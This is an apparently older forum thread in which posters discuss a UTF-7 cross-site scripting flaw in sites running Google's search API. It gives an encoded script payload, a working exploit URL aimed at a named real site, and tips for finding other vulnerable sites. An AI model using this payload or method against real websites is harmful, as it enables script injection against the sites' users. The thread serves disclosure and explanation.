So i fell asleep last night and didn't finish the encoding script as i assumed i would. But finally finished (pain in the ass to write btw)

The topic is plenty descriptive - it's an XSS in most sites that uses the google search API with it's generic results template. The api allows any encoding method to be used for output, and doesn't sanitize until after the page has been converted. (Google.com uses the same API but it's unaffected because it santizes in UTF8 before converting to the output encoding)

Did i confuse you yet? _-_ Just add the parameter oe=UTF-7 to any site using google's search API and the query q=<script>alert("XSS")</script> converted to UTF-7 using http://maluc.sitesled.com/utf7.html .. Which translates to:

You can also sometimes append any parameter like apple=">[Injection] to the search string:
http://externalsearch.nist.gov/search?client=default_frontend&site=itl_antd_collection&output=xml_no_dtd&proxystylesheet=default_frontend&ie=UTF8&oe=UTF-7&as_q=asdf&apple=%2BACI-%2BAD4-%2BADw-SCRIPT%2BAD4-alert(%2BACI-XSS%2BACI-)%2BADw-/SCRIPT%2BAD4-%2BADw-x

One problem though: any site with embedded script like for(i=0;i<10;i++) gets changed to for(i=0;i<10;i ) .. which is an infinite loop. you'll have to overwrite that when exploiting..

because of how UTF7 encoding works.. any special characters - i.e. not
a-z A-Z 0-9 or ' ( ) , - . / : ?
.. get encoded. And the format has the start character of + and optional end character of -. like < to +ADw-

So ++ gets interpretted as an invalid encoding and erased. An annoying side-effect if that infinite for() loop comes before the injection and thus can't be overwritten fast enough :/ .. luckily, most seem to be afterwards so they can be fixed during exploit

as i said in the first post.. google.com is not affected because they sanitize all input in UTF-8 (whereas their Search Appliance product sanitizes it in the output encoding of choice)

so if your input encoding is set to UTF-8 (or anything that's not UTF-7), and your output to UTF-7
query= +ADw- :
it sanitizes, but nothing is dangerous. then it converts the +ADw- to UTF-7, +-ADw- .. which is the correct way to encode a +

if you set the input to UTF-7 .. and output to UTF-7
query= +ADw- :
it first converts the +ADw- to UTF-8, or < .. then it santizes that - changing it to %22. then it converts that back to UTF-7, +ACU-22 .. which is the correct way to encode %22

Since google always sanitizes in UTF-8 .. there's no way around it. If there was, i never would've disclosed it >:)

I follow with what you are saying, but somewhere something got changed.

When i compare the results from last week to this week using the same links i can confidently say that they have changed the parser function within the last week. This i know because i could break of out the search input field and today i can't. The problem i originally had was that i couldn't figure out the correct way to submit the search value and get it to xss.

Furthermore today's results compared against last week show that they have removed the + signs altogether from the search field which was causing the breakout (when used with utf-7).

Maluc, is there a way to circumvent this in "normal" sites? i can image by just tamper the header to read UTF-7 instead of UTF-8. Or is this idea too wild? i'm not completely absored by your UTF-7 info, so any explaination is welcome.

Like: sending a form, and in the same time changing the UTF-8 > UTF-7 ?

Well each browser will have it's default encoding set in its Options. So if it's not explicitly said otherwise, it uses the default. I don't think you'll find many users with UTF-7 or US-ASCII as default. And i can only think of two ways to define it explicitly in an HTML page:

the Search Appliance works because it sets the meta charset to whatever oe= in the GET. That's the main way i find it on random sites. Except more than 50% of the time, i find it as an Advanced Search feature that's there but never even used normally. So keep an eye on the View Source and GET string.

the second way that i'm not sure if it's possible.. is to use Flash to send a raw Request to the page and include the header Accept-Charset: UTF-7
it may not be as simple as that though, and may reuiqre something more like Accept-Charset: UTF-7;q=0,ISO-8859-1 or UTF-8 if that's the websites default. q=0 means that charset is not allowed. Again, i haven't tried this out yet..

the quality value (q=0) is kinda confusing to explain so i'll point ya to the RFC2616 section 14.2.And i can't really think of any other way right now. That might be because it's 9am and i haven't sleapt yet ^^;

lol.. well it seems like anything short of arbitrary code execution isn't enough to make it into CERTs database. And no pentesters were credited on that summary page - so i'm happy enough to see them mention it ^^

That said, i stumbled upon that announcement right after they made it.. and was the reason i stopped to test their site more thoroughly. but i promise i'm not bitter >.>

i was really hoping their search engine would be vulnerable to the same issue since it has a charset=blah .. but i came up empty when i tried it last week :/